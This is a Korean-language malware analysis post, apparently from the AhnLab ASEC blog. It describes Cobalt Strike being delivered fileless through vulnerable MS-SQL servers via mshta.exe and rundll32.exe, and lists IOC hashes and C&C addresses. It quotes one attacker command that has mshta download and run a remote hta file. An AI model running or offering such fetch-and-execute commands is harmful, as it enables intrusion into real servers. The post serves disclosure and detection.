취약한 MS-SQL 서버를 대상으로 유포 중인 코발트 스트라이크 (2)

지난 2월 14일 ASEC 분석팀은 취약한 MS-SQL 서버를 통해 코발트 스트라이크가 유포됨을 공유하였다.

이번 사례는 당시 유포 방식과 다른 프로세스 트리 구조를 갖는 형태의 코발트 스트라이크를 유포하는 정황을 확인하였다. 확인된 유포 방식은 MS-SQL 서버 관련 프로세스인 sqlservr.exe가 취약점에 의해 cmd.exe를 실행하는 것 까지는 동일하나, 이후 mshta.exe와 rundll32.exe를 이용하여 메모리 상에서 파일리스 형태로 코발트 스트라이크를 실행하는 점이 다르다.

[그림 1] 코발트 스트라이크실행 트리구조

공격자는 MS-SQL 취약점에 의해 실행된 cmd.exe를 통해 mshta.exe 프로세스를 실행하였다. mshta.exe는 정상 윈도우 유틸리티로써 Java 스크립트, Visual Basic 스크립트 실행 및 URL을 직접 전달하여 hta 파일을 실행하는 기능을 수행한다. 이번 사례의 경우 URL을 아래와 같이 mshta 프로세스의 인자값으로 전달하여 공격자 서버에서 악성 hta 파일을 다운로드받아 실행하였다.

  • mshta.exe http[:]//114.132.246[.]102:1222/bobo.png
[그림 2] bobo.png(hta 파일)

다운로드된 hta는 코발트 스트라이크 페이로드(Stasger)가 포함된 xsl 스크립트를 공격자 서버에서 다운로드 받아 실행하는 기능을 수행한다.

[그림 3] bobo.xsl 스크립트 코드 일부

해당 xsl 스크립트가 실행되면 rundll32.exe에 코발트 스트라이크 (Stager)를 인젝션하여 실행한다. 이후 C&C 서버로 부터 비컨이 다운로드되어 다양한 원격 제어 명령을 수행할 수 있게된다.

[그림 4] 코발트 스트라이크 설정 파일

안랩 V3 제품에서는 해당 유형에 대해 다음과 같이 진단하고 있다.

[IOC]
[hta 스크립트]
(MD5, 진단명, 엔진버전)
– 591ec011ec21d1a3a05863e72910c55f (Downloader/JS.Agent) 2022.02.16.00

[xsl 스크립트]
(MD5, 진단명, 엔진버전)
– dab62efb57014b0508fa1a8ff10b736a (Trojan/JS.Scriptinject.S1252) 2020.07.11.00

[C&C 서버]
– 114.132.246[.]102
– hxxp://114.132.246[.]102:1222/bobo.png
– hxxp://114.132.246[.]102:1222/bobo.xsl

0 0 votes
별점 주기
guest
1 댓글
Inline Feedbacks
View all comments
trackback

[…] – [ASEC 블로그] 취약한 MS-SQL 서버를 대상으로 유포 중인 Remcos RAT– [ASEC 블로그] 취약한 MS-SQL 서버를 대상으로 유포 중인 코발트 스트라이크– [ASEC 블로그] 취약한 MS-SQL 서버를 대상으로 유포 중인 코발트 스트라이크 (2) […]